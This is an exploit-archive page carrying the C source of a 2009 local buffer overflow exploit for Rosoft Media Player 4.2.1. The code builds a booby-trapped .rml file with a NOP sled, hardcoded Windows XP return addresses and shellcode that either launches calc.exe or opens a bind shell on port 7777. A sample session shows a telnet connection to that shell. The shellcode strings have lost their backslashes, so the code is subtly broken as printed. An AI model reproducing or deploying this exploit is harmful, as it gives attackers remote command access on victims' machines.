[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Rosoft Media Player 4.2.1 Local Buffer Overflow Exploit (multi target)
# Published : 2009-03-16
# Author : SimO-s0fT
# Previous Title : Icarus 2.0 (.PGN File) Local Stack Overflow Exploit (SEH)
# Next Title : Foxit Reader 3.0 (<= Build 1301) PDF Buffer Overflow Exploit (Univ.)
/* rsmpf.c
* Rosoft media player free local buffer overflow Exploit multi targets
* Coded By :
* SimO-s0fT (Maroc-anti-connexion@hotmail.com)
* thanks To : Stack & fl0 fl0w & SKD
* and special thanks to str0ke for his advices and support ( you are the best brotha )
* example :
* ##########################################################################################
# Coded By SimO-s0fT #
* # 0 [*]Microsoft Windows Trust SP3 (Frensh):ESP #
* # 1 [*]Microsoft Windows Trust SP2 (Frensh):ESP #
* # 2 [*]Microsoft Windows XP SP3 (Frensh) : ESP #
* # 3 [*]Microsoft Windows XP SP2 (Frensh) : ESP #
* # USAGE : #
* # exploit1.exe file.rml platform #
* # more information contact me { Maroc-anti-connexion[at]hotmail[dot]com } #
* # failed...: No such file or directory #
* # C:Documents and SettingsThe FanopsisBureau>exploit1 simo.rml 0 #
* # [1] execute calc.exe #
* # [2] execute bindshell LPORT=7777 #
* # Choose a neumber : 2 #
* # simo.rml has been created! #
* # C:Documents and SettingsThe FanopsisBureau>telnet 41.250.22.124 7777 #
* # Console - Windows Trust 3.0 (Service Pack 3: v55 #
* # #
* # (C) 1985-2008 Microsoft Corp. #
* # #
* # #
* # C:Documents and SettingsThe FanopsisBureau> #
* ##########################################################################################
*
********************************************************************************************************/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#define OFFSET 4096
// calc (pour tester l'exploit)
char scode1[]=
"x29xc9x83xe9xddxd9xeexd9x74x24xf4x5bx81x73x13xa9"
"x21xdbx5bx83xebxfcxe2xf4x55xc9x9fx5bxa9x21x50x1e"
"x95xaaxa7x5exd1x20x34xd0xe6x39x50x04x89x20x30x12"
"x22x15x50x5ax47x10x1bxc2x05xa5x1bx2fxaexe0x11x56"
"xa8xe3x30xafx92x75xffx5fxdcxc4x50x04x8dx20x30x3d"
"x22x2dx90xd0xf6x3dxdaxb0x22x3dx50x5ax42xa8x87x7f"
"xadxe2xeax9bxcdxaax9bx6bx2cxe1xa3x57x22x61xd7xd0"
"xd9x3dx76xd0xc1x29x30x52x22xa1x6bx5bxa9x21x50x33"
"x95x7exeaxadxc9x77x52xa3x2axe1xa0x0bxc1xd1x51x5f"
"xf6x49x43xa5x23x2fx8cxa4x4ex42xbax37xcax0fxbex23"
"xccx21xdbx5b";
//bind shell LPORT 7777
char scode2[] =
"xebx03x59xebx05xe8xf8xffxffxffx49x49x49x49x49x49"
"x49x49x49x37x49x49x49x49x49x49x49x49x51x5ax6ax61"
"x58x30x42x31x50x42x41x6bx41x41x71x32x41x42x41x32"
"x42x41x30x42x41x58x38x41x42x50x75x6dx39x4bx4cx32"
"x4ax5ax4bx50x4dx6dx38x6bx49x49x6fx59x6fx39x6fx35"
"x30x6cx4bx70x6cx65x74x37x54x4cx4bx42x65x47x4cx6e"
"x6bx31x6cx46x65x33x48x43x31x48x6fx6cx4bx70x4fx65"
"x48x6cx4bx73x6fx35x70x37x71x38x6bx31x59x4cx4bx46"
"x54x6ex6bx53x31x58x6ex30x31x6fx30x4fx69x4ex4cx4b"
"x34x49x50x41x64x46x67x49x51x7ax6ax46x6dx43x31x48"
"x42x5ax4bx38x74x47x4bx30x54x64x64x51x38x42x55x4b"
"x55x4ex6bx53x6fx51x34x43x31x4ax4bx50x66x4ex6bx46"
"x6cx42x6bx4cx4bx73x6fx75x4cx33x31x5ax4bx65x53x34"
"x6cx6ex6bx6dx59x30x6cx57x54x55x4cx55x31x4bx73x74"
"x71x69x4bx65x34x6ex6bx43x73x74x70x6cx4bx67x30x46"
"x6cx6cx4bx70x70x67x6cx6ex4dx6cx4bx57x30x44x48x71"
"x4ex72x48x4ex6ex50x4ex54x4ex38x6cx70x50x4bx4fx4e"
"x36x71x76x41x43x31x76x31x78x76x53x30x32x53x58x30"
"x77x44x33x57x42x63x6fx70x54x6bx4fx48x50x73x58x58"
"x4bx58x6dx6bx4cx57x4bx70x50x6bx4fx6ax76x71x4fx6d"
"x59x4bx55x65x36x6cx41x68x6dx53x38x63x32x42x75x51"
"x7ax36x62x59x6fx58x50x71x78x4ax79x34x49x4bx45x6e"
"x4dx30x57x69x6fx4ex36x52x73x41x43x62x73x76x33x51"
"x43x70x43x43x63x73x73x36x33x6bx4fx4ax70x75x36x41"
"x78x75x4ex71x71x35x36x42x73x4bx39x79x71x6cx55x70"
"x68x4fx54x75x4ax32x50x39x57x52x77x69x6fx38x56x70"
"x6ax72x30x50x51x53x65x4bx4fx58x50x55x38x6cx64x4c"
"x6dx34x6ex49x79x66x37x6bx4fx4ex36x50x53x30x55x69"
"x6fx4ax70x53x58x7ax45x41x59x4ex66x37x39x36x37x69"
"x6fx59x46x72x70x50x54x31x44x33x65x4bx4fx5ax70x4f"
"x63x51x78x38x67x50x79x38x46x43x49x32x77x4bx4fx4b"
"x66x62x75x79x6fx6ax70x45x36x30x6ax52x44x30x66x41"
"x78x32x43x72x4dx6fx79x6dx35x62x4ax42x70x70x59x74"
"x69x5ax6cx6cx49x6bx57x41x7ax32x64x6bx39x68x62x30"
"x31x6fx30x6bx43x6ex4ax6bx4ex51x52x34x6dx49x6ex62"
"x62x36x4cx5ax33x6cx4dx71x6ax65x68x6ex4bx4cx6bx4e"
"x4bx55x38x30x72x59x6ex4cx73x37x66x4bx4fx30x75x63"
"x74x39x6fx6ex36x33x6bx36x37x72x72x31x41x31x41x46"
"x31x50x6ax55x51x31x41x41x41x32x75x42x71x39x6fx48"
"x50x50x68x6cx6dx39x49x45x55x78x4ex30x53x39x6fx6b"
"x66x62x4ax79x6fx39x6fx47x47x39x6fx58x50x4ex6bx50"
"x57x4bx4cx6cx43x4bx74x70x64x6bx4fx6ax76x41x42x49"
"x6fx58x50x30x68x68x6fx6ax6ex4bx50x31x70x42x73x49"
"x6fx58x56x49x6fx78x50x61";
struct adresses
{char *platform;
unsigned long addr;
}
systems[]=
{
{"[*]Microsoft Windows Trust SP3 (Frensh):ESP",0x7D60DECB },
{"[*]Microsoft Windows Trust SP2 (Frensh):ESP",0x7C85D569 },
{"[*]Microsoft Windows XP SP3 (Frensh) : ESP" ,0x7E498C6B },
{"[*]Microsoft Windows XP SP2 (Frensh) : ESP" ,0x7C82385D },
{NULL },
};
char NOP1[]="x90x90x90x90";// n0t working
char NOP2[]="x90x90x90x90x90x90x90x90";
int main(int argc,char *argv[]){
FILE *s;
unsigned char *buffer;
unsigned int RET= systems[atoi(argv[2])].addr;
unsigned char bchars[]="xF0xFFxFDx7F";
int i;
int number;
int offset=0;
if (argc <2){
system("cls");
printf("Coded By SimO-s0fTn");
for(i=0;systems[i].platform;i++)
printf("%d tt %sn",i,systems[i].platform);
printf("USAGE : nt");
printf(argv[0]);
printf(".exe ");
printf("file.rml ");
printf("platformn");
printf("more information contact me { Maroc-anti-connexion[at]hotmail[dot]com }n");
}
if ((s=fopen(argv[1],"wb"))==NULL){
perror("failed...");
exit(0);
}
printf("[1] execute calc.exen");
printf("[2] execute bindshell LPORT=7777n");
printf(" Choose a neumber : ");
scanf("%d",&number);
switch(number){
case 1: buffer=(unsigned char *) malloc (OFFSET+strlen(bchars)+strlen(NOP1)+4+strlen(NOP2)+strlen(scode1));
memset(buffer,0x90,OFFSET+strlen(bchars)+strlen(NOP1)+4+strlen(NOP2)+strlen(scode1));
offset=OFFSET;
memcpy(buffer+offset,bchars,strlen(bchars));
offset+=strlen(bchars);
memcpy(buffer+offset,NOP1,strlen(NOP1));
offset+=strlen(NOP1);
memcpy(buffer+offset,&RET,4);
offset+=4;
memcpy(buffer+offset,NOP2,strlen(NOP2));
offset+=strlen(NOP2);
memcpy(buffer+offset,scode1,strlen(scode1));
offset+=strlen(scode1);
fputs(buffer,s);
fclose(s);
printf("%s has been created!",argv[1]);
free(buffer);
break;
case 2: buffer=(unsigned char *) malloc (OFFSET+strlen(bchars)+strlen(NOP1)+4+strlen(NOP2)+strlen(scode2));
memset(buffer,0x90,OFFSET+strlen(bchars)+strlen(NOP1)+4+strlen(NOP2)+strlen(scode2));
offset=OFFSET;
memcpy(buffer+offset,bchars,strlen(bchars));
offset+=strlen(bchars);
memcpy(buffer+offset,NOP1,strlen(NOP1));
offset+=strlen(NOP1);
memcpy(buffer+offset,&RET,4);
offset+=4;
memcpy(buffer+offset,NOP2,strlen(NOP2));
offset+=strlen(NOP2);
memcpy(buffer+offset,scode2,strlen(scode2));
offset+=strlen(scode2);
fputs(buffer,s);
fclose(s);
printf("%s has been created!",argv[1]);
free(buffer);
break;
}
return 0;
}
// www.Syue.com [2009-03-16]